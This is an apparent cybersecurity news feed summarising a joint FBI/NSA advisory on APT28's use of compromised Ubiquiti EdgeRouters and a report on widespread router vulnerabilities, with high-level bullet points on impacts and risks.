    📌 Data breaches and theft of sensitive information, intellectual property, or trade secrets.

    📌 Disruption of critical infrastructure operations, such as power grids, transportation systems, or manufacturing processes.

    📌 Compromise of government networks and systems, potentially leading to espionage or national security threats.

    📌 Financial losses due to operational disruptions, theft of customer data, or reputational damage.

    📌 Potential safety risks if control systems or operational technology (OT) networks are compromised.

    📌 Loss of customer trust and confidence in the affected organizations.

    Free
  • 19 Aug 2024
    3 minutes

    The document titled «Cyber Actors Use Compromised Routers to Facilitate Cyber Operations» released by the Federal Bureau of Investigation (FBI), National Security Agency (NSA), US Cyber Command, and international partners warns of the use of compromised Ubiquiti EdgeRouters to facilitate malicious cyber operations worldwide.

    The popularity of Ubiquiti EdgeRouters is attributed to their user-friendly, Linux-based operating system, default credentials, and limited firewall protections. The routers are often shipped with insecure default configurations and do not automatically update firmware unless configured by the user.

    The compromised EdgeRouters have been used by APT28 to harvest credentials, collect NTLMv2 digests, proxy network traffic, and host spear-phishing landing pages and custom tools. APT28 accessed the routers using default credentials and trojanized OpenSSH server processes. With root access to the compromised routers, the actors had unfettered access to the Linux-based operating systems to install tooling and obfuscate their identity.

    APT28 also deployed custom Python scripts on the compromised routers to collect and validate stolen webmail account credentials obtained through cross-site scripting and browser-in-the-browser spear-phishing campaigns. Additionally, they exploited a critical zero-day elevation-of-privilege vulnerability in Microsoft Outlook (CVE-2023-23397) to collect NTLMv2 digests from targeted Outlook accounts and used publicly available tools to assist with NTLM relay attacks.

    Key points and takeaways

    📌 APT28 (also known as Fancy Bear, Forest Blizzard, and Strontium) has been exploiting compromised Ubiquiti EdgeRouters to conduct malicious cyber ops globally.

    📌 The exploitation includes harvesting credentials, collecting NTLMv2 digests, proxying network traffic, and hosting spear-phishing landing pages and custom tools.

    📌 The FBI, NSA, US Cyber Command, and international partners have issued a joint Cybersecurity Advisory (CSA) detailing the threat and providing mitigation recommendations.

    Free
  • 18 Aug 2024
    2 minutes

    📌 Widespread Vulnerabilities: A significant number of vulnerabilities, some 226 in total, collectively pose a substantial security risk.

    📌 Outdated Components: Core components such as the Linux kernel and additional services like VPN or multimedia software in these routers are often outdated, making them susceptible to known exploits.

    📌 Default Passwords and Unencrypted Connections: Many routers come with easy-to-guess default passwords and use unencrypted connections, which can be easily exploited by attackers.

    📌 Compromised Devices and Data: Once a router is compromised, all devices protected by its firewall become vulnerable, allowing attackers to monitor, redirect, block, or tamper with data.

    📌 Risk to Critical Infrastructure: Compromised routers can be used to attack critical infrastructure, potentially disrupting essential services in communications, energy, transportation, and water sectors.

    📌 DoS and Traffic Interception: Vulnerabilities in protocols can lead to denial-of-service attacks against host services and interception of both internal and external traffic.

    📌 Eavesdropping and attacks: Attackers can eavesdrop on traffic and launch further network-based attacks, making it difficult for users to detect a breach due to minimal router user interfaces.

    📌 Potential for Large-Scale Exploitation: The sheer number of vulnerable devices, estimated in the millions, indicates a significant potential for widespread exploitation by malicious actors.

    Free